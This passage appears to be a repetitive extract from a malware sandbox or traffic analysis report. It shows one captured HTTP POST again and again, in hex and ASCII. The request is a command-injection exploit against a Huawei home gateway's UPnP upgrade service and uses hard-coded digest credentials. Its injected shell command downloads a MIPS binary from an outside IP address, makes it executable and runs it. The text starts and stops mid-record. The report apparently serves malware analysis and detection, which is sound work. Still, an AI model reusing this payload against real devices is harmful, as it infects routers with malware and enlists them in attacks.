50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 